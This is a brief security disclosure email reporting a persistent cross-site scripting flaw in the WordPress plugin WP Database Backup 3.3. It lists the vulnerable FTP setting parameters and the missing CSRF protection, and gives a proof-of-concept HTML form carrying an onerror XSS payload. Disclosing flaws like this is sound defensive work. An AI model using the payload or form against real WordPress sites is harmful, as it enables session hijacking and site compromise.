Subject: Persistent Cross-Site Scripting (XSS) in WP Database Backup 3.3
Date: Thu, 20 Aug 2015 15:22:30 +0200

Hello,

Plugin: WP Database Backup 3.3 https://wordpress.org/plugins/wp-database-backup/

1. Persistent Cross-Site Scripting (XSS) 

Authenticated administrators can store arbitrary html/js code (there is no CSRF protection).

Method: POST
Url: http://localhost/wp-admin/tools.php?page=wp-database-backup
Vulnerable parameters: backupbreeze_ftp_host, backupbreeze_ftp_user, backupbreeze_ftp_port, backupbreeze_ftp_pass, backupbreeze_ftp_subdir

Example PHP callstack:
/wp-database-backup/includes/admin/Destination/FTP/ftp-form.php:135

Verification:
--
<form method="POST" action="http://localhost/wp-admin/tools.php?page=wp-database-backup" />
<input type="text" name="backupbreeze_ftp_host" value='"><img src=x onerror=alert(1) /> XXXXXXXXXX' />
<input type="text" name="backupbreeze_ftp_hidden" value="Y" />
<input type="submit" />
</form>
--


--
Regards,
Marcin Probola,